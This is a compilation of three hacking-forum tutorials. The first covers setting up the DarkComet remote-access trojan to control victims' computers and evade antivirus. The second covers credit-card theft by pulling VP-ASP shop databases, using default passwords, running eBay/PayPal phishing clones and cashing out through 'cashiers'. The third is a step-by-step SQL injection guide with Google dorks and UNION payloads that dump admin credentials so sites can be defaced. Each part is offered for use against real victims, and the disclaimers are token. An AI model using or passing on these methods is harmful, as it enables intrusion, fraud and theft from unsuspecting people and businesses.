Setup DarkComet Full Tutorial + Port Forwarding Solution

• How Can You Hack A Computer ?
• What is DNS ? And Its DNS Use In RAT ( Remote Administration Tool ) 
• What Is UNPN  ?
• How to Setup UNPN for RATS ?
• How To Setup DarkComet ?
• How to Port Forward TCP/UDP ?
• Setup Rat Without Port forwarding  
• List of the Top Ten Rats

Before Starting Please note that this tutorial is only for educational purpose i am not responsible for any of your act done after reading this tutorial 

Many Peoples Now a days were requesting me to write one article on how could they setup a RAT ( Remote Administration Tool ) which is used to remotely control the computer,s or in simple words to hack the computers.

         To setup Rat You Must have the basic knowledge of some important things which we will discuss below and many peoples on the internet are searching for how to setup RAT but they are confused of different methods which create,s a nexus and they fail to setup their RAT server but after reading this article i guarantee you that you will be able to setup you rat server.

  1. How Can You Hack A Computer ?
Well Everyone ask this Question and to hack a computer there are many ways of hacking computer by exploiting it and one of the most famous way to hack the computer used by many hackers is to execute the RAT Server in the victim,s computer , once you have executed the server you will be able to control his computer from A to Z mean everything.

 2. What is DNS ? And Use of DNS in RAT ?

DNS Stands for Domain Name Service and we use DNS in our RAT to make our server long lasting even forever and With the help of DNS we can access our slave,s computer for long time untill the DNS wont expire.

        

       DNS ( Domain Name Server ) plays a middle man role between your Ip Address and The Victim,s Ip Address to transfer the Data And if we use our ip address in the RAT server the RAT server will work and we will be able to hack the pc of victim but as we know that the Ip Address changes with time so when our ip address will be changed we will lose our all of slaves so this is the reason we use DNS because when slave,s computer will send the data like pictures or anything to us it will first send the data to DNS domain name sever and after DNS will verify the our latest Ip Address and after verifying the Ip Address it will send the data to us via our IP.

To make it easy for you i have prepared a drawing for you so you can understand it quiet easily check it.

In this Picture you can see that DNS is playing a middle man role and it only updates our ip address so even if our ip changes with time we have no worries to lose our slaves.

How can you get a DNS service ? 

 You can get a free DNS service and from www.noip.com 

What Is Port Forwarding ? And Its Use in RAT

  Port is a protocol which is used to transfer data from one Ip Address to Another Ip Address and there are two types of Ports which are mentioned below.

• TCP
• UDP

   TCP and UDP are two types of Ports which are the backbone to setup your RAT server and we will have to forward both TCP and UDP both of the same number on our computer and also on our router , while many peoples do one big mistake that they only forward TCP/UDP Port on their computer or only on their router so please keep in mind that you have to forward the both TCP/UDP port with same number on your router and also as well as on your computer.

What If You cant Forward the Port ? To Setup RAT 

 If You Cant forward the port to setup RAT due to some reasons then there is one more option lefted for you which is like a wildcard , Yes i will show you how to setup RAT using UNPN function so you can setup Rat without port forwarding.

What is UNPN ? And its Key Role In RAT 

 Universal Plug and Play is a set of networking protocols that permits networked devices to send and receive data on any port which is being used and called by UNPN. As i mentioned that many peoples are having problem in port forwarding so today i will share two methods of setting up rat one with port forwarding and one without port forwarding and both work,s well for me.

Now we have learned almost every basic thing necessary to setup a Rat Server so lets get started.

TUTORIAL : - 

First Download darkcomet from here " Click here to download " and after to forward your port also download auto port forwarding tool so click here " click here to download auto port forwarding tool  " 

To Get Started you should download two things one is RAT ( Remote Administration Tool ) and second is NO-IP Client. ( No-Ip) Client will automatically update our ip to the DNS 

For this tutorial i would be using the famous and the most stable RAT Tool " Dark Comet V 5.3 " and i am not providing the link to download so in future you may blame on me for the share of virus so Search on Google to download " Dark-Comet 5.3 ". It is the most stable and working version.

NO-IP Setup 

• Goto www.noip.com click on Sign Up 
• Fill Up the Form and chose free Dns 

Step 1  ( Port Forwarding ) 

  

1. Open CMD and type

  ipconfig

After this  you will find the Default GateWay IP address so note down or copy it

 Note:- Every Router has its different gateway theme 

2. Open Web-Browser and type the IP Address in the URL Address BAR and Login GateWay Will Appear.

3. Login to the Router 

Default User and Password,s are 

• user : admin
• pass : admin
• user  : admin
• pass  : admin123  ( If you fail to login try Googling your router,s default user pass ) or contact the admin

4. After Login find the place to forward the ports like in my router the path is Networking > Forwarding 

5. After Finding the Port Forwarding Section write down your IP V 4 : IP Address which you can also find by typing in cmd " ipconfig "  

• Write the IP Address in Servers IP BOX
• Write 1122 port number in begin and end box and select tcp/udp or if you have only one choice then select TCP and after adding the TCP add UDP in the same way.
• Click Save 

After Forwarding the TCP/UDP port from the Router Now Open DarkComet 

• Click on Socket TAB

• Right Click on Socke Handle Boxes and click on Add Port To Listen And Write down " 1122 " port in the box.

• After Writing the Port Click on Listen and it will start listening
• Now Goto www.canyouseeme.org 

• If you get the Success in Green it mean you have done it and port is forwarded and now there are 100% chances that your RAT will work. and if you get Error in RED sign saying " Error: I could not see your service on....." Then you have done somthing wrong in forwarding your port on Router. So try to search on Google That " How TO Port Forward on 'your router name'  " 
• Note that If you are still getting that error please read furthure below we can do one more thing as we can setup rat using UNPN function so please have some patience and move to the UNPN. 

UNPN ( Setup Without Port forwarding ) 

Note :- If you have sucessfully forwarded your port please move to step 2 and leave it 

 Many Routers are enabled with UNPN function but try to check that UNPN is enabled on your router by logging in and checking in the forwarding or networking section.

• You Must Have Utorrent So download it - Click here 
• Open Dark-Comet and click on socket 

•  Now Right Click below the Socket Handle and A box will open so write down 1122 port in that box

• Note: DO Not Close DarkComet leave it as it is 
• Now open Utorrent and click on Option > Preferences 
• Now In This write down the port 1122 in a box near random ports and click on OK 

• After Clicking OK you have done it now Port is forwarded using UNPN so check it by entering your port inwww.canyouseeme.org 

The Myth Or Logic Behind that trick 

 STEP 2 ( Creation of Server ) 

  

•  To create the server please click on DarkComet-Rat to open Options  
• After Click on Server Module And then click on Minimalist.

• Now  A box will appear and you have to type your details in it.

1.  In Stub Id write your server name .
2. In IP/DNS write you DNS Address which you created while sign up on www.noip.com.
3. In Port write down the same port you forwarded " 1122 " .
4. Click on Normal and Chose the path where to save the server and click save.

Step 4 ( Setting UP No-Ip DNS Client ) 

• Download the NO-IP client by clicking here ( or goto noip.com and click on download ) 
• Now After Downloading Install it and Open it 
• If you cant find it please search in start menu " DUC " you will get it 

• Click on Edit Hosts 

• Chose Your Hosts by click on check box and click on save 

Now Click on Refresh Now and you will see 3 green signals and its a good symbol keep in mind that before starting DarkComet Please Refresh it once because it will update your ip address in your slaves so you can access them and also if you will not refresh your no-ip in 60 days they will delete your account so refresh your noip daily.

Now send the server which you created to any of your victim which you want to hack and after he executes that server on his/her Computer then he will appear on your DarkComet Module and you can control his pc for a long time.

Note that do not try to test the server on your own computer because it will not work on your own computer so try to test it on any,ones computer and the victim must not have Anti Virus because Dark comet is detected by almost every anti Virus so you will have to encrypt your server to make it Undetectable.

Tutorial Hacking Credit Card

Hi Cyberworlds member. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).

This tutorial is divided in two parts.

1. Introduction into Credit Cards
2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:

• Debit Card
• Credit Card

1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :

• First name
• Last name
• Address
• City
• State
• Zip
• Country
• Phone
• CC number
• Expiry
• CVV2 ( this is 3digit security code on backside after signature panel )

If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:

• Credit Card Scams ( usually used for earning money , some times for shopping )
• Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )

1. Shopadmin Hacking 

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:

• xDatabase
• shopping140
• xDblocation
• resx
• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r

Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use emaileBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.

SQL Injection Tutorial! 100% NOOB FRIENDLY!!

Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.

Bookmark this for future reference if you want.

Lets start. 

 

What is SQL Injection?

is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Source

Step 1: Choose Your Target 

Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerabl sites are able to be injected into. You can't just SQL Inject any site *sigh*.
 
So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.
 
Dorks 
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=
inurl:customer_testimonials.php?testimonial_id=
inurl:.php?rsnType=1&id=
inurl:support.php?id=
inurl:gallery_view.php?id=
Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.
 
I personally recommend going here (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.
 
After you have Googled the dorks, click on any site.
 
To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:
 
 
http://www.sitename.com/main.php?id=232' 
If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.

Step 2: Find the Vulnerable Column 

Now that we found our vulnerable site, we will need to find the vulnerable columns.
 
Add this to the end of the URL:
 
 
http://www.sitename.com/main.php?id=232 order by 1-- 
Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:
 
 
http://www.sitename.com/main.php?id=232 order by 1-- (no error)
http://www.sitename.com/main.php?id=232 order by 2-- (no error)
http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)
http://www.sitename.com/main.php?id=232 order by 5-- (no error)
http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!) 
The goal here is to find the least column the shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.
 
Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5-- 
Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.
 
Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.

Step 3: Obtain Version Number and Database Name 

That vulnerable column is the ONLY column that we will be editing.
 
Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5-- 
If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.
 
Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5-- 
And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.

Step 4: Obtain Table Names 

We are almost done, don't give up just yet.
 
Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail adresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.
 
Edit the code as follows:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()-- 
Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", Admin_pass", "User_id", etc..
 
The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1-- 
This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.
 
When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.
 
For this tutorial, we will be using the table name of "admin".

Step 5: View the Columns, and Find the Fucking Crucial Shit 

Here comes the fun part :3
 
To find the column names, add this to the end of the URL:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"-- 
Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.
Go here and type in your table name where is says "Say Hello to My Little Friend".
 
In my case, this is the string that I got after I inputted "admin" to the input space:
 
 
61646d696e 
Now, replace the table name with hex as so:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e-- 
Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.
 
Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:
 
 
Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc.. 
Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin-- 
The "0x3a" will put a colon to where the information will be separated. You should get something like this:
 
 
1:MyName:e10adc3949ba59abbe56e057f20f883e 
The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij. Download Havij here .
 
Now as you can see. This is the login info:
 
 
Username: MyName
Pass: 123456 
Now all you have to do is find the admin page, which is usually 
http://www.sitename.com/admin
http://www.sitename.com/adminlogin
http://www.sitename.com/admin_login
http://www.sitename.com/login
or something similar. There are tools online that will find you the admin page.

Download Havij here